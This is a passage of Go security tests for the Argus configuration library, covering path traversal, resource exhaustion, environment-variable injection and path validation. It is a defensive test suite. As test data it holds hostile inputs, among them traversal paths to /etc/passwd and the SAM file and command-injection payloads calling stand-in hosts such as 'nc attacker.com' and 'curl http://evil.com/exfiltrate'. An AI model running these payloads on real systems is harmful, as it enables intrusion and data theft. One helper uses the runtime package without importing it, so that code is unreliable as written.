				t.Errorf("SECURITY REGRESSION: UNC path %q was accepted, should be blocked", testCase.path)
			}

			// Verify the error message indicates UNC path blocking
			if err != nil && !strings.Contains(err.Error(), "windows device name not allowed") {
				t.Errorf("Expected Windows device name error for %q, got: %v", testCase.path, err)
			}

			t.Logf("✓ UNC path %q correctly blocked: %v", testCase.path, err)
		})
	}

	// Edge cases found by the fuzzer that still need analysis
	edgeCasePaths := []string{
		"//0/Con",    // Server "0" with folder "Con" - should this be allowed?
		"/\\000/Con", // Mixed separator server "000" with folder "Con" - attack or legitimate?
		"//srv/Con",  // Server "srv" with folder "Con" - clearly legitimate
		"//Con/srv",  // Device "Con" with folder "srv" - clearly attack
	}

	for _, path := range edgeCasePaths {
		t.Run("edge_case_"+path, func(t *testing.T) {
			err := ValidateSecurePath(path)
			// Log the current behavior for analysis
			t.Logf("Edge case path %q result: %v", path, err)

			// For now, we document this behavior but don't assert
			// This may be legitimate: server "0", folder "Con"
			// vs device access which should be blocked
		})
	}

	// Test that legitimate UNC paths (non-device) are still allowed
	legitimateUNCPaths := []string{
		"//server/share/config.json",
		"\\\\server\\share\\config.json",
		"//host/folder/app.yaml",
		"\\\\host\\folder\\app.yaml",
	}

	for _, path := range legitimateUNCPaths {
		t.Run("legitimate_"+path, func(t *testing.T) {
			err := ValidateSecurePath(path)
			// These should be allowed (non-device UNC paths)
			if err != nil && strings.Contains(err.Error(), "windows device name not allowed via UNC path") {
				t.Errorf("Legitimate UNC path %q was incorrectly blocked as device: %v", path, err)
			}
			t.Logf("UNC path %q result: %v", path, err)
		})
	}
}
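
// The edge cases above hinge on which component occupies the UNC "server"
// position. A sketch of extracting that component (illustrative only, and it
// assumes only '/' and '\' act as separators):
func uncFirstComponent(path string) string {
	trimmed := strings.TrimLeft(path, "/\\")
	if end := strings.IndexAny(trimmed, "/\\"); end != -1 {
		return trimmed[:end]
	}
	return trimmed
}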

```

## /argus_security_test.go

```go path="/argus_security_test.go" 
// argus_security_test.go: Comprehensive Security Testing Suite for Argus
//
// RED TEAM SECURITY ANALYSIS:
// This file implements systematic security testing against Argus configuration framework,
// designed to identify and prevent common attack vectors in production environments.
//
// THREAT MODEL:
// - Malicious configuration files (path traversal, injection attacks)
// - Environment variable poisoning and injection
// - Remote configuration server attacks (SSRF, content poisoning)
// - Resource exhaustion and DoS attacks
// - Audit trail manipulation and log injection
// - Race conditions and concurrent access vulnerabilities
//
// PHILOSOPHY:
// Each test is designed to be:
// - DRY (Don't Repeat Yourself) with reusable security utilities
// - SMART (Specific, Measurable, Achievable, Relevant, Time-bound)
// - COMPREHENSIVE covering all major attack vectors
// - WELL-DOCUMENTED explaining the security implications
//
// METHODOLOGY:
// 1. Identify attack surface and entry points
// 2. Create targeted exploit scenarios
// 3. Test boundary conditions and edge cases
// 4. Validate security controls and mitigations
// 5. Document vulnerabilities and remediation steps
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"sync"
	"testing"
	"time"
)

// =============================================================================
// SECURITY TESTING UTILITIES AND HELPERS
// =============================================================================

// SecurityTestContext provides utilities for security testing scenarios.
// This centralizes common security testing patterns and reduces code duplication.
type SecurityTestContext struct {
	t                *testing.T
	tempDir          string
	createdFiles     []string
	createdDirs      []string
	originalEnv      map[string]string
	cleanupFunctions []func()
	mu               sync.Mutex
}

// NewSecurityTestContext creates a new security testing context with automatic cleanup.
//
// SECURITY BENEFIT: Ensures test isolation and prevents test artifacts from
// affecting system security or other tests. Critical for reliable security testing.
func NewSecurityTestContext(t *testing.T) *SecurityTestContext {
	tempDir := t.TempDir() // Automatically cleaned up by testing framework

	ctx := &SecurityTestContext{
		t:                t,
		tempDir:          tempDir,
		createdFiles:     make([]string, 0),
		createdDirs:      make([]string, 0),
		originalEnv:      make(map[string]string),
		cleanupFunctions: make([]func(), 0),
	}

	// Register cleanup
	t.Cleanup(ctx.Cleanup)

	return ctx
}

// CreateMaliciousFile creates a file with potentially dangerous content for testing.
//
// SECURITY PURPOSE: Tests how Argus handles malicious configuration files,
// including path traversal attempts, injection payloads, and malformed content.
//
// Parameters:
//   - filename: Name of file to create (will be created in safe temp directory)
//   - content: Malicious content to write
//   - perm: File permissions (use restrictive permissions for security)
//
// Returns: Full path to created file for testing
func (ctx *SecurityTestContext) CreateMaliciousFile(filename string, content []byte, perm os.FileMode) string {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// SECURITY: Always create files in controlled temp directory
	// This prevents accidental system file modification during testing
	filePath := filepath.Join(ctx.tempDir, filepath.Clean(filename))

	// Ensure directory exists
	dir := filepath.Dir(filePath)
	if err := os.MkdirAll(dir, 0755); err != nil {
		ctx.t.Fatalf("Failed to create directory for malicious file: %v", err)
	}

	// Create the malicious file
	if err := os.WriteFile(filePath, content, perm); err != nil {
		ctx.t.Fatalf("Failed to create malicious file: %v", err)
	}

	ctx.createdFiles = append(ctx.createdFiles, filePath)
	return filePath
}

// SetMaliciousEnvVar temporarily sets an environment variable to a malicious value.
//
// SECURITY PURPOSE: Tests environment variable injection and poisoning attacks.
// This is critical since many applications trust environment variables implicitly.
//
// The original value is automatically restored during cleanup to prevent
// contamination of other tests or the system environment.
func (ctx *SecurityTestContext) SetMaliciousEnvVar(key, maliciousValue string) {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// Store original value for restoration
	if _, exists := ctx.originalEnv[key]; !exists {
		ctx.originalEnv[key] = os.Getenv(key)
	}

	// Set malicious value
	if err := os.Setenv(key, maliciousValue); err != nil {
		ctx.t.Fatalf("Failed to set malicious environment variable %s: %v", key, err)
	}
}

// ExpectSecurityError validates that a security-related error occurred.
//
// SECURITY PRINCIPLE: Security tests should expect failures when malicious
// input is provided. If an operation succeeds with malicious input, that
// indicates a potential security vulnerability.
//
// This helper makes security test intentions clear and reduces boilerplate.
func (ctx *SecurityTestContext) ExpectSecurityError(err error, operation string) {
	if err == nil {
		ctx.t.Errorf("SECURITY VULNERABILITY: %s should have failed with malicious input but succeeded", operation)
	}
}

// ExpectSecuritySuccess validates that a legitimate operation succeeded.
//
// SECURITY PRINCIPLE: Security controls should not break legitimate functionality.
// This helper validates that security measures don't introduce false positives.
func (ctx *SecurityTestContext) ExpectSecuritySuccess(err error, operation string) {
	if err != nil {
		ctx.t.Errorf("SECURITY ISSUE: %s should have succeeded with legitimate input but failed: %v", operation, err)
	}
}

// CreatePathTraversalFile creates a file with path traversal attempts in the name.
//
// SECURITY PURPOSE: Tests whether Argus properly validates and sanitizes file paths
// to prevent directory traversal attacks that could access sensitive system files.
//
// Common path traversal patterns:
// - "../../../etc/passwd" (Unix path traversal)
// - "..\\..\\..\\windows\\system32\\config\\sam" (Windows path traversal)
// - URL-encoded variations (%2e%2e%2f, etc.)
// - Unicode variations (overlong UTF-8, etc.)
func (ctx *SecurityTestContext) CreatePathTraversalFile(traversalPath string, content []byte) string {
	// SECURITY NOTE: We create the file with a safe name in temp directory,
	// but test Argus with the dangerous traversal path
	safeName := strings.ReplaceAll(traversalPath, "/", "_")
	safeName = strings.ReplaceAll(safeName, "\\", "_")
	safeName = strings.ReplaceAll(safeName, "..", "dotdot")

	return ctx.CreateMaliciousFile(safeName, content, 0644)
}

// Cleanup restores environment and removes temporary files.
//
// SECURITY IMPORTANCE: Proper cleanup prevents test contamination and
// ensures security tests don't leave dangerous artifacts on the system.
func (ctx *SecurityTestContext) Cleanup() {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// Run custom cleanup functions first
	for _, fn := range ctx.cleanupFunctions {
		func() {
			defer func() {
				if r := recover(); r != nil {
					ctx.t.Logf("Warning: Cleanup function panicked: %v", r)
				}
			}()
			fn()
		}()
	}

	// Restore environment variables
	for key, originalValue := range ctx.originalEnv {
		if originalValue == "" {
			if err := os.Unsetenv(key); err != nil {
				ctx.t.Errorf("Failed to unset env %s: %v", key, err)
			}
		} else {
			if err := os.Setenv(key, originalValue); err != nil {
				ctx.t.Errorf("Failed to restore env %s: %v", key, err)
			}
		}
	}

	// Note: File cleanup is handled by t.TempDir() automatically
}

// AddCleanup registers a cleanup function to be called during test cleanup.
//
// SECURITY PURPOSE: Allows security tests to register custom cleanup logic
// for resources like network connections, databases, or system state changes.
func (ctx *SecurityTestContext) AddCleanup(fn func()) {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()
	ctx.cleanupFunctions = append(ctx.cleanupFunctions, fn)
}

// =============================================================================
// PATH TRAVERSAL AND DIRECTORY TRAVERSAL SECURITY TESTS
// =============================================================================

// TestSecurity_PathTraversalAttacks tests for directory traversal vulnerabilities.
//
// ATTACK VECTOR: Path traversal (CWE-22)
// DESCRIPTION: Malicious actors attempt to access files outside the intended
// directory by using "../" sequences or equivalent techniques.
//
// IMPACT: If successful, attackers could read sensitive system files like
// /etc/passwd, /etc/shadow, Windows SAM files, or application secrets.
//
// MITIGATION EXPECTED: Argus should validate and sanitize file paths before
// using them, rejecting or normalizing dangerous path components.
func TestSecurity_PathTraversalAttacks(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	// Define common path traversal attack patterns
	pathTraversalAttacks := []struct {
		name        string
		path        string
		description string
	}{
		{
			name:        "BasicUnixPathTraversal",
			path:        "../../../etc/passwd",
			description: "Basic Unix directory traversal attempt to access system password file",
		},
		{
			name:        "DeepUnixPathTraversal",
			path:        "../../../../../../../../etc/shadow",
			description: "Deep directory traversal with excessive ../ components",
		},
		{
			name:        "WindowsPathTraversal",
			path:        "..\\..\\..\\windows\\system32\\config\\sam",
			description: "Windows-style directory traversal to access SAM database",
		},
		{
			name:        "MixedPathSeparators",
			path:        "../..\\../etc/passwd",
			description: "Mixed path separators to bypass simple filtering",
		},
		{
			name:        "URLEncodedTraversal",
			path:        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
			description: "URL-encoded path traversal to bypass string-based filters",
		},
		{
			name:        "DoubleEncodedTraversal",
			path:        "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd",
			description: "Double URL-encoded traversal for systems that decode twice",
		},
		{
			name:        "NullByteInjection",
			path:        "../../../etc/passwd\x00.config",
			description: "Null byte injection to truncate path and bypass extension validation",
		},
		{
			name:        "UnicodeNormalization",
			path:        "..\u002f..\u002f..\u002fetc\u002fpasswd",
			description: "Unicode normalization attack using alternative slash representations",
		},
	}

	for _, attack := range pathTraversalAttacks {
		t.Run(attack.name, func(t *testing.T) {
			// Create a watcher to test path validation
			watcher := New(Config{
				PollInterval: 100 * time.Millisecond,
				Audit:        AuditConfig{Enabled: false}, // Disable audit to focus on core vulnerability
			})
			defer func() {
				if err := watcher.Close(); err != nil {
					// Only log if the error is not "watcher is not running"
					if !strings.Contains(err.Error(), "watcher is not running") {
						t.Logf("Failed to close watcher: %v", err)
					}
				}
			}()

			// SECURITY TEST: Attempt to watch a file with malicious path
			// Expected behavior: This should fail with appropriate error
			err := watcher.Watch(attack.path, func(event ChangeEvent) {
				t.Errorf("SECURITY VULNERABILITY: Callback should never be called for malicious path: %s", attack.path)
			})

			// SECURITY ASSERTION: Path traversal should be rejected
			ctx.ExpectSecurityError(err, fmt.Sprintf("watching malicious path: %s (%s)", attack.path, attack.description))

			if err == nil {
				t.Logf("SECURITY CRITICAL: Path traversal was not blocked for: %s", attack.description)

				// If watch succeeded, test if it actually accesses the system file
				if err := watcher.Start(); err != nil {
					t.Logf("Failed to start watcher: %v", err)
				}
				time.Sleep(200 * time.Millisecond) // Allow some processing time
				if err := watcher.Stop(); err != nil {
					t.Errorf("Failed to stop watcher: %v", err)
				}

				// Log detailed security analysis
				t.Errorf("SECURITY VULNERABILITY CONFIRMED: Argus accepted malicious path '%s' which could lead to unauthorized file access. Attack: %s",
					attack.path, attack.description)
			}
		})
	}
}

// TestSecurity_PathValidationBypass tests attempts to bypass path validation.
//
// ATTACK VECTOR: Path validation bypass (CWE-23)
// DESCRIPTION: Sophisticated attackers may try to bypass path validation
// using encoding, normalization, or other techniques not covered by basic filters.
//
// This test focuses on advanced bypass techniques that might evade
// simple string-based or regex-based path validation.
func TestSecurity_PathValidationBypass(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	// Advanced path traversal bypass techniques
	bypassAttempts := []struct {
		name        string
		path        string
		description string
	}{
		{
			name:        "SymlinkTraversal",
			path:        ctx.tempDir + "/malicious_symlink", // Will create symlink to /etc/passwd
			description: "Symlink-based traversal to access files outside intended directory",
		},
		{
			name:        "OverlongPathComponents",
			path:        strings.Repeat("../", 100) + "etc/passwd",
			description: "Overlong path with excessive traversal components to cause buffer issues",
		},
		{
			name:        "PathNormalizationAttack",
			path:        "./../../etc/passwd",
			description: "Path normalization attack using current directory references",
		},
		{
			name:        "WindowsDeviceNames",
			path:        "CON",
			description: "Windows device name that could cause DoS or unexpected behavior",
		},
		{
			name:        "WindowsAlternateDataStream",
			path:        "config.txt:hidden_stream",
			description: "Windows alternate data stream to hide malicious content",
		},
	}

	for _, bypass := range bypassAttempts {
		t.Run(bypass.name, func(t *testing.T) {
			// Special setup for symlink test
			if bypass.name == "SymlinkTraversal" {
				// Create malicious symlink pointing to system file
				symlinkPath := bypass.path
				targetPath := "/etc/passwd" // Unix system file

				// Create symlink in safe temp directory
				err := os.Symlink(targetPath, symlinkPath)
				if err != nil && !os.IsExist(err) {
					t.Skip("Cannot create symlink for test (may require permissions)")
				}
			}

			watcher := New(Config{
				PollInterval: 100 * time.Millisecond,
				Audit:        AuditConfig{Enabled: false},
			})
			defer func() {
				if err := watcher.Close(); err != nil {
					// Only log if the error is not "watcher is not running"
					// This is expected for security tests where Watch() fails
					if !strings.Contains(err.Error(), "watcher is not running") {
						t.Errorf("Failed to close watcher: %v", err)
					}
				}
			}()

			// SECURITY TEST: Attempt path validation bypass
			err := watcher.Watch(bypass.path, func(event ChangeEvent) {
				t.Errorf("SECURITY VULNERABILITY: Callback executed for bypass attempt: %s", bypass.path)
			})

			// SECURITY ASSERTION: Bypass attempts should fail
			ctx.ExpectSecurityError(err, fmt.Sprintf("path validation bypass: %s (%s)", bypass.path, bypass.description))

			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path validation bypass succeeded for: %s - %s",
					bypass.path, bypass.description)
			}
		})
	}
}

// =============================================================================
// RESOURCE EXHAUSTION AND DENIAL OF SERVICE TESTS
// =============================================================================

// TestSecurity_ResourceExhaustionAttacks tests for DoS via resource exhaustion.
//
// ATTACK VECTOR: Resource exhaustion (CWE-400)
// DESCRIPTION: Attackers attempt to consume excessive system resources
// (memory, file descriptors, CPU) to cause denial of service.
//
// IMPACT: Could cause application crashes, system instability, or service
// unavailability affecting legitimate users.
//
// MITIGATION EXPECTED: Argus should implement proper resource limits and
// gracefully handle resource exhaustion scenarios.
func TestSecurity_ResourceExhaustionAttacks(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	t.Run("MaxWatchedFilesExhaustion", func(t *testing.T) {
		// SECURITY TEST: Attempt to exceed MaxWatchedFiles limit
		// This tests whether Argus properly enforces resource limits

		watcher := New(Config{
			PollInterval:    100 * time.Millisecond,
			MaxWatchedFiles: 5, // Intentionally low limit for testing
			Audit:           AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				// This is expected for security tests where operations fail
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Errorf("Failed to close watcher: %v", err)
				}
			}
		}()

		// Add files up to the limit
		for i := 0; i < 5; i++ {
			filePath := ctx.CreateMaliciousFile(fmt.Sprintf("file_%d.txt", i), []byte("test"), 0644)
			err := watcher.Watch(filePath, func(event ChangeEvent) {})
			ctx.ExpectSecuritySuccess(err, fmt.Sprintf("watching file %d within limit", i))
		}

		// SECURITY TEST: Attempt to exceed the limit
		extraFilePath := ctx.CreateMaliciousFile("extra_file.txt", []byte("test"), 0644)
		err := watcher.Watch(extraFilePath, func(event ChangeEvent) {})

		// SECURITY ASSERTION: Should reject request exceeding limit
		ctx.ExpectSecurityError(err, "watching file beyond MaxWatchedFiles limit")

		if err == nil {
			t.Error("SECURITY VULNERABILITY: MaxWatchedFiles limit was not enforced - potential DoS vector")
		}
	})

	t.Run("MemoryExhaustionViaLargeConfigs", func(t *testing.T) {
		// SECURITY TEST: Attempt memory exhaustion via large configuration files
		// Large configs could cause excessive memory allocation during parsing

		// Create a very large configuration file (10MB of JSON)
		largeConfigSize := 10 * 1024 * 1024 // 10MB
		largeConfig := make([]byte, largeConfigSize)

		// Fill with valid JSON to test parser memory usage.
		// The pattern must not repeat the opening brace; it is written once below.
		jsonPattern := `"key_%d": "value_%d", `
		pos := 0
		counter := 0
		largeConfig[pos] = '{'
		pos++

		for pos < largeConfigSize-100 {
			part := fmt.Sprintf(jsonPattern, counter, counter)
			if pos+len(part) >= largeConfigSize-100 {
				break
			}
			copy(largeConfig[pos:], part)
			pos += len(part)
			counter++
		}

		// Close JSON properly and trim the unused zero-filled tail, which
		// would otherwise leave trailing NUL bytes in the document
		closing := `"end": "end"}`
		copy(largeConfig[pos:], closing)
		largeConfig = largeConfig[:pos+len(closing)]

		largePath := ctx.CreateMaliciousFile("large_config.json", largeConfig, 0644)

		watcher := New(Config{
			PollInterval: 100 * time.Millisecond,
			Audit:        AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Logf("Failed to close watcher: %v", err)
				}
			}
		}()

		// SECURITY TEST: Watch large file and measure resource usage
		var memBefore, memAfter uint64

		// Measure memory before
		memBefore = getCurrentMemoryUsage()

		err := watcher.Watch(largePath, func(event ChangeEvent) {
			// Parse the large config to trigger potential memory issues
			_, parseErr := ParseConfig(largeConfig, FormatJSON)
			if parseErr != nil {
				t.Logf("Large config parsing failed: %v", parseErr)
			}
		})

		if err == nil {
			if err := watcher.Start(); err != nil {
				t.Logf("Failed to start watcher: %v", err)
			}

			// Trigger file change to test parsing memory usage
			ctx.CreateMaliciousFile("large_config.json", append(largeConfig, []byte(" ")...), 0644)

			time.Sleep(500 * time.Millisecond) // Allow processing

			// Measure memory after
			memAfter = getCurrentMemoryUsage()

			if err := watcher.Stop(); err != nil {
				t.Errorf("Failed to stop watcher: %v", err)
			}

			// SECURITY ANALYSIS: Check for reasonable memory usage.
			// Guard against unsigned underflow: a GC run between samples can
			// leave memAfter below memBefore.
			if memAfter > memBefore {
				memDiff := memAfter - memBefore
				if memDiff > 50*1024*1024 { // More than 50MB increase
					t.Errorf("SECURITY WARNING: Large config caused excessive memory usage: %d bytes increase", memDiff)
				}
			}
		}
	})

	t.Run("FileDescriptorExhaustion", func(t *testing.T) {
		// SECURITY TEST: Attempt to exhaust file descriptors
		// This could cause system-wide issues if not properly managed

		watcher := New(Config{
			PollInterval:    50 * time.Millisecond, // Aggressive polling
			MaxWatchedFiles: 100,
			Audit:           AuditConfig{Enabled: false},
		})
		defer func() {
			if err := watcher.Close(); err != nil {
				// Only log if the error is not "watcher is not running"
				if !strings.Contains(err.Error(), "watcher is not running") {
					t.Logf("Failed to close watcher: %v", err)
				}
			}
		}()

		// Create many files and watch them to test FD usage
		for i := 0; i < 50; i++ { // Test with moderate number
			filePath := ctx.CreateMaliciousFile(fmt.Sprintf("fd_test_%d.txt", i), []byte("test"), 0644)

			err := watcher.Watch(filePath, func(event ChangeEvent) {})
			if err != nil {
				t.Logf("Could not watch file %d (may have hit system limits): %v", i, err)
				break
			}
		}

		// Start intensive polling to test FD management
		if err := watcher.Start(); err != nil {
			t.Logf("Failed to start watcher: %v", err)
		}
		time.Sleep(1 * time.Second) // Allow intensive polling
		if err := watcher.Stop(); err != nil {
			t.Logf("Failed to stop watcher: %v", err)
		}

		// SECURITY CHECK: Create new watcher to test FD recovery
		newWatcher := New(Config{
			PollInterval:    100 * time.Millisecond,
			MaxWatchedFiles: 100,
		})

		testFile := ctx.CreateMaliciousFile("fd_recovery_test.txt", []byte("test"), 0644)
		err := newWatcher.Watch(testFile, func(event ChangeEvent) {})
		ctx.ExpectSecuritySuccess(err, "file descriptor recovery after intensive usage")

		// Clean up new watcher
		_ = newWatcher.Stop()
	})
}

// getCurrentMemoryUsage returns the current heap allocation in bytes,
// using runtime.MemStats so the memory-growth checks above are meaningful.
// Note: requires "runtime" in this file's import block.
func getCurrentMemoryUsage() uint64 {
	var m runtime.MemStats
	runtime.ReadMemStats(&m)
	return m.HeapAlloc
}

// =============================================================================
// ENVIRONMENT VARIABLE INJECTION TESTS
// =============================================================================

// TestSecurity_EnvironmentVariableInjection tests for env var injection vulnerabilities.
//
// ATTACK VECTOR: Environment variable injection (CWE-74)
// DESCRIPTION: Attackers manipulate environment variables to inject malicious
// values into the application, potentially bypassing security controls.
//
// IMPACT: Could lead to configuration tampering, privilege escalation,
// or execution of unintended commands if environment values are used unsafely.
//
// This is particularly dangerous in containerized environments where
// environment variables are commonly used for configuration.
func TestSecurity_EnvironmentVariableInjection(t *testing.T) {
	ctx := NewSecurityTestContext(t)

	t.Run("PathInjectionViaEnvironment", func(t *testing.T) {
		// SECURITY TEST: Inject malicious paths via environment variables
		// Tests whether env config loading properly validates path values

		maliciousPaths := []string{
			"../../../etc/passwd",
			"/proc/self/environ",
			"\\..\\..\\..\\windows\\system32\\config\\sam",
			"/dev/random", // Could cause DoS if read from
			"CON",         // Windows device name
			"/proc/1/mem", // Kernel memory access attempt
		}

		for _, maliciousPath := range maliciousPaths {
			t.Run(fmt.Sprintf("Path_%s", strings.ReplaceAll(maliciousPath, "/", "_")), func(t *testing.T) {
				// Set malicious audit output file via environment
				ctx.SetMaliciousEnvVar("ARGUS_AUDIT_OUTPUT_FILE", maliciousPath)

				// SECURITY TEST: Attempt to load config with malicious path
				config, err := LoadConfigFromEnv()

				if err == nil && config != nil {
					// If config loaded successfully, check if it contains the malicious path
					if config.Audit.OutputFile == maliciousPath {
						t.Errorf("SECURITY VULNERABILITY: Malicious path accepted via environment variable: %s", maliciousPath)
					} else {
						t.Logf("SECURITY GOOD: Environment path was sanitized or rejected")
					}
				} else {
					t.Logf("SECURITY GOOD: Configuration loading failed with malicious path (expected)")
				}
			})
		}
	})

	t.Run("CommandInjectionViaEnvironment", func(t *testing.T) {
		// SECURITY TEST: Attempt command injection via environment variables
		// Tests whether any env values are unsafely passed to system commands

		commandInjectionPayloads := []string{
			"; rm -rf /",
			"| nc attacker.com 443",
			"&& curl http://evil.com/exfiltrate",
			"`whoami`",
			"$(id)",
			"%SYSTEMROOT%\\System32\\calc.exe",
			"; powershell.exe -ExecutionPolicy Bypass",
		}

		for _, payload := range commandInjectionPayloads {
			t.Run(fmt.Sprintf("Injection_%d", len(payload)), func(t *testing.T) {
				// Test injection in various environment variables
				envVars := []string{
					"ARGUS_REMOTE_URL",
					"ARGUS_AUDIT_OUTPUT_FILE",
					"ARGUS_VALIDATION_SCHEMA",
				}

				for _, envVar := range envVars {
					ctx.SetMaliciousEnvVar(envVar, payload)

					// SECURITY TEST: Load config and ensure payload is not executed
					config, err := LoadConfigFromEnv()

					// SECURITY ANALYSIS: Even if config loads, payload should not execute
					if err == nil && config != nil {
						// Verify that the payload wasn't interpreted as a command
						// In a real test, we would check for signs of command execution
						t.Logf("Config loaded with potential injection payload in %s - verify no execution occurred", envVar)
					}
				}
			})
		}
	})

	t.Run("ConfigurationOverrideAttacks", func(t *testing.T) {
		// SECURITY TEST: Attempt to override security-critical configurations
		// Tests whether attackers can disable security features via environment

		securityOverrides := []struct {
			envVar         string
			maliciousValue string
			description    string
		}{
			{"ARGUS_AUDIT_ENABLED", "false", "Attempt to disable audit logging"},
			{"ARGUS_MAX_WATCHED_FILES", "999999", "Attempt to bypass file watching limits"},
			{"ARGUS_POLL_INTERVAL", "1ns", "Attempt to cause excessive CPU usage via rapid polling"},
			{"ARGUS_CACHE_TTL", "0", "Attempt to disable caching and cause performance DoS"},
			{"ARGUS_BOREAS_CAPACITY", "1", "Attempt to cripple event processing capacity"},
		}

		for _, override := range securityOverrides {
			t.Run(override.envVar, func(t *testing.T) {
				ctx.SetMaliciousEnvVar(override.envVar, override.maliciousValue)

				config, err := LoadConfigFromEnv()

				if err == nil && config != nil {
					// SECURITY ANALYSIS: Check if dangerous overrides were applied
					switch override.envVar {
					case "ARGUS_AUDIT_ENABLED":
						if !config.Audit.Enabled {
							t.Errorf("SECURITY VULNERABILITY: %s - Audit logging was disabled via environment", override.description)
						}
					case "ARGUS_MAX_WATCHED_FILES":
						if config.MaxWatchedFiles > 1000 {
							t.Errorf("SECURITY WARNING: %s - Excessive MaxWatchedFiles limit set: %d", override.description, config.MaxWatchedFiles)
						}
					case "ARGUS_POLL_INTERVAL":
						if config.PollInterval < time.Millisecond {
							t.Errorf("SECURITY WARNING: %s - Dangerously low poll interval: %v", override.description, config.PollInterval)
						}
					}
				}
			})
		}
	})
}

// TestSecurity_ValidateSecurePath tests the validateSecurePath function comprehensively
// including the case-insensitivity fix for consistent security validation.
func TestSecurity_ValidateSecurePath(t *testing.T) {
	tests := []struct {
		name          string
		path          string
		shouldFail    bool
		expectedError string
		description   string
	}{
		// Basic valid paths
		{
			name:        "ValidSimplePath",
			path:        "config.json",
			shouldFail:  false,
			description: "Simple filename should be allowed",
		},
		{
			name:        "ValidRelativePath",
			path:        "configs/app.yaml",
			shouldFail:  false,
			description: "Valid relative path should be allowed",
		},
		{
			name:        "ValidAbsolutePath",
			path:        "/etc/argus/config.json",
			shouldFail:  false,
			description: "Valid absolute path should be allowed",
		},

		// Edge cases
		{
			name:          "EmptyPath",
			path:          "",
			shouldFail:    true,
			expectedError: "empty path not allowed",
			description:   "Empty paths should be rejected",
		},

		// Path traversal attacks - case sensitive patterns
		{
			name:          "BasicParentDir",
			path:          "..",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Parent directory reference should be blocked",
		},
		{
			name:          "UnixTraversal",
			path:          "../../../etc/passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Unix path traversal should be blocked",
		},
		{
			name:          "WindowsTraversal",
			path:          "..\\..\\windows\\system32\\config\\sam",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Windows path traversal should be blocked",
		},
		{
			name:          "AbsoluteTraversal",
			path:          "/var/www/../../../etc/passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Absolute path with traversal should be blocked",
		},

		// Case sensitivity tests - CRITICAL for the fix
		{
			name:          "UppercaseTraversal",
			path:          "../../../ETC/PASSWD",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Uppercase path traversal should be blocked (case-insensitive)",
		},
		{
			name:          "MixedCaseTraversal",
			path:          "../../../Etc/Passwd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Mixed case path traversal should be blocked (case-insensitive)",
		},
		{
			name:          "UppercaseWindowsTraversal",
			path:          "..\\..\\WINDOWS\\SYSTEM32",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Uppercase Windows traversal should be blocked (case-insensitive)",
		},

		// URL-encoded attacks
		{
			name:          "URLEncodedDots",
			path:          "%2e%2e/%2e%2e/etc/passwd",
			shouldFail:    true,
			expectedError: "URL-encoded traversal pattern",
			description:   "URL-encoded dots should be detected",
		},
		{
			name:          "DoubleEncodedDots",
			path:          "%252e%252e/etc/passwd",
			shouldFail:    true,
			expectedError: "URL-encoded traversal pattern",
			description:   "Double URL-encoded dots should be detected",
		},
		{
			name:          "MixedEncodingAttack",
			path:          "..%2fetc%2fpasswd",
			shouldFail:    true,
			expectedError: "dangerous traversal pattern",
			description:   "Mixed encoding attacks should be detected (caught by traversal pattern first)",
		},

		// System file protection - case insensitive
		{
			name:          "EtcPasswd",
			path:          "/etc/passwd",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to /etc/passwd should be blocked",
		},
		{
			name:          "EtcPasswdUppercase",
			path:          "/ETC/PASSWD",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to /ETC/PASSWD should be blocked (case-insensitive)",
		},
		{
			name:          "WindowsSystem32",
			path:          "C:\\Windows\\System32\\config\\sam",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to Windows system files should be blocked",
		},
		{
			name:          "WindowsSystem32Uppercase",
			path:          "C:\\WINDOWS\\SYSTEM32\\CONFIG\\SAM",
			shouldFail:    true,
			expectedError: "system file/directory not allowed",
			description:   "Access to WINDOWS\\SYSTEM32 should be blocked (case-insensitive)",
		},

		// Windows device names
		{
			name:          "WindowsDeviceCON",
			path:          "CON",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name CON should be blocked",
		},
		{
			name:          "WindowsDevicePRN",
			path:          "prn.txt",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name PRN should be blocked",
		},
		{
			name:          "WindowsDeviceCOM1",
			path:          "com1.log",
			shouldFail:    true,
			expectedError: "windows device name not allowed",
			description:   "Windows device name COM1 should be blocked",
		},

		// Alternate Data Streams
		{
			name:          "AlternateDataStream",
			path:          "file.txt:hidden",
			shouldFail:    true,
			expectedError: "alternate data streams not allowed",
			description:   "Windows Alternate Data Streams should be blocked",
		},

		// Path length limits
		{
			name:          "ExcessivelyLongPath",
			path:          strings.Repeat("a", 5000),
			shouldFail:    true,
			expectedError: "path too long",
			description:   "Excessively long paths should be rejected",
		},
		{
			name:          "DeeplyNestedPath",
			path:          strings.Repeat("a/", 60),
			shouldFail:    true,
			expectedError: "path too complex",
			description:   "Deeply nested paths should be rejected",
		},

		// Control characters
		{
			name:          "NullByteInjection",
